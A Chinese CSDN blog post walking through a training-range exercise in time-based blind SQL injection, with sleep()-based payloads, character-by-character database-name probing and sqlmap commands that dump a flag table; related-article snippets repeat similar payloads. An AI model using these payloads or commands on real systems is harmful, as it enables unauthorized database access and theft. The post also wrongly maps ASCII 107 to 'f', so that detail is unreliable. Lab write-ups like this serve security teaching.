【SQL注入--延时注入】

最新推荐文章于 2024-06-03 07:48:05 发布
最新推荐文章于 2024-06-03 07:48:05 发布
阅读量788 收藏 2
点赞数 2
分类专栏: 渗透测试 网络安全 内蒙古工业大学 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52351575/article/details/127213927
版权

原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对
第一题:

我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化

" and 1=2 %23

在这里插入图片描述
然后尝试延时注入,重新输入代码

" and sleep(5) %23

在这里插入图片描述
所以判定我们输入的sql代码得到了执行
于是,我们输入代码,来查询数据库的长度
在这里插入图片描述
依次修改代码中的9依次递增,发现在代码是

and if(length(database())>12,sleep(5),1) #

的时候,界面没有任何延迟,于是判定数据库的长度是12个字节长
接着,我们利用ascii()的函数去找出数据库的第一个字母的ascii码值

and if(ascii(substr(database(),1,1))>90,sleep(5),1) #
在这里插入图片描述
改90的值,依次递增,最终得到代码

and if(ascii(substr(database(),1,1))>107,sleep(5),1) #

的时候是没有任何延迟的,所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f

and if(ascii(substr(database(),2,1))>97,sleep(5),1) #

在这里插入图片描述
一一和ascii码值对应,最终得到数据库名字

kanwolongxia

得到数据库名后,直接用sqlmap跑出表名

python sqlmap.py -u http://59.63.200.79:8815/Pass-13/index.php?id=1 -D kanwolongxia --tabales
在这里插入图片描述

再跑列名

python sqlmap.py -u http://59.63.200.79:8815/Pass-13/index.php?id=1 -D kanwolongxia -T loflag --columns
在这里插入图片描述
最终直接抛出数据
python sqlmap.py -u http://59.63.200.79:8815/Pass-13/index.php?id=1 -D kanwolongxia -T loflag -C flaglo --dump
在这里插入图片描述

༄༊ξ陈丞(网安圈花瓶)࿐
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入-概述-ppt.pptx
10-27
7. **延时注入**:通过延迟查询的时间来验证SQL语句是否执行成功。 **攻击后果** 一旦SQL注入成功,攻击者可能会执行以下操作: 1. **暴库**:暴露整个数据库内容,获取大量敏感信息。 2. **获取管理员账户**:利用...
SQL注入延时注入
Mr.Huang_的博客
08-28 804
掌控安全靶场地址: http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 ?id=1" and 1=2 --+ 然后使用延时注入 ?id=1" and sleep(10) --+ 1.判断当前数据库的长度 这里我们用到了数据库里的if语
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4836
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL注入-时间盲注
最新发布
WolvenSec的博客
06-03 1742
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
sql注入延时注入
weixin_45653478的博客
04-09 1584
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入延时注入
qq_45557130的博客
10-07 1545
sql注入延时注入
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 4267
SQL注入篇 - 布尔盲注及延时注入
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 1594
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
sql注入字典fuzz
01-11
6. **数据库特定功能**:例如MySQL特有的`sleep`函数可用于延时注入测试;`information_schema`可用来获取数据库的信息;`concat_ws()`、`substring`等函数则可以用来拼接或截取字符串。 7. **控制流语句**:如`IF`,...
sql注入的思维导图。
04-19
SQL注入思维导图 SQL注入是一种常见的Web应用程序安全漏洞, attackers...* 多种方式注入最好不用延时注入 * 使用多种方式来绕过WAF SQL注入是一种常见的Web应用程序安全漏洞,需要我们对其进行深入的了解和防御。
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库...SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
SQL.rar_sql injection_sql 注入_sql注入
09-14
- **时间盲注**:如果应用无法正确处理查询时间,攻击者可能通过延时注入探测数据库结构,而无需直接获取数据。 4. **SQL.cpp源代码分析**: 这个文件可能包含示例代码,演示如何创建易受SQL注入攻击的应用,以及...
SQL注入漏洞-05】延时注入靶场实战
cc
02-04 6463
布尔盲注和延时注入的相同点:都是通过浏览器页面两种不同的响应来推测输入条件的真假性布尔盲注和延时注入的不同点:布尔盲注是在条件真假时页面会有不同的显示延时注入则是只能在响应时间上推测显示结果的真假延时注入的缺点:有时候网页响应慢并不是因为sleep语句起的效果,也可能是网络等外部因素的影响。同时时间成本很高。
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2583
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
细说——SQL注入的常见方式
LainWith的博客
11-04 7209
目录BurpSuite预配置1. 安装CO22. 配置CO23. 小试牛刀使用pikachu靶场的“字符型注入”联合查询(union)函数介绍order byunion selectlimit操作报错盲注1. 获取数据库名2. 获取敏感信息3.获取 mysql 账号密码其他报错函数4. 获取表名4.1 获取第一张表4.2 获取第二张表4.3 获取所有表5. 获取列5.1 获取第一列5.2 获取第二列5.3 获取所有列6. 获取列中的数据6.1 获取第一组数据6.2 获取第二组数据6.3 获取所有数据布尔盲注
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 7210
延时注入】结合if、case when 延时注入
sql注入——延时注入
qq_52843411的博客
08-23 1010
无论我们怎样变化,或者改变闭合,都无法是页面做出不同的回显,我们有理由相信他为一个静态页面,当然,作为一个练习,这个肯定是有漏洞的,我们可以通过页面相应的时间来做出判断,我们可以通过sleep()函数,来使页面进行延迟响应。我们对页面进行了延时,导致页面的响应时间比正常情况下都要慢五秒钟,我们可以通过对响应时间的长短,来判断真假,要判断真假,就要用到我们的if函数。)第一个字段为判读语句,第二个字段为判断为真时执行的语句,第三个字段为判断为假时执行的语句。我们可知第一个字符ASCII为53,即5。
cfthub sql注入 时间注入
07-15
时间注入(Time-based Injection)是SQL注入的一种形式,它利用延时函数或时间相关操作来确认SQL查询是否成功执行。攻击者可以利用时间注入来获取敏感信息或以其他方式干扰应用程序的正常运行。 要防止SQL注入和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

༄༊ξ陈丞(网安圈花瓶)࿐

点个关注呗。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值